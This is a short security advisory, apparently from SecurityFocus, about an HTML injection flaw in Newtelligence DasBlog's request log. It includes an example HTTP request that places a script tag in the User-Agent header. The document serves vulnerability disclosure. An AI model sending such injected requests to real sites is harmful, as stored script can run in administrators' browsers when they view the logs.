Newtelligence DasBlog Request Log HTML Injection Vulnerability

An exploit is not required, however an example HTTP request sufficient to exploit this vulnerability has been provided:

GET / HTTP/1.1
User-Agent: <script>alert('xss')</script>
Host: www.example.com
Accept: */*


 

Privacy Statement
Copyright 2010, SecurityFocus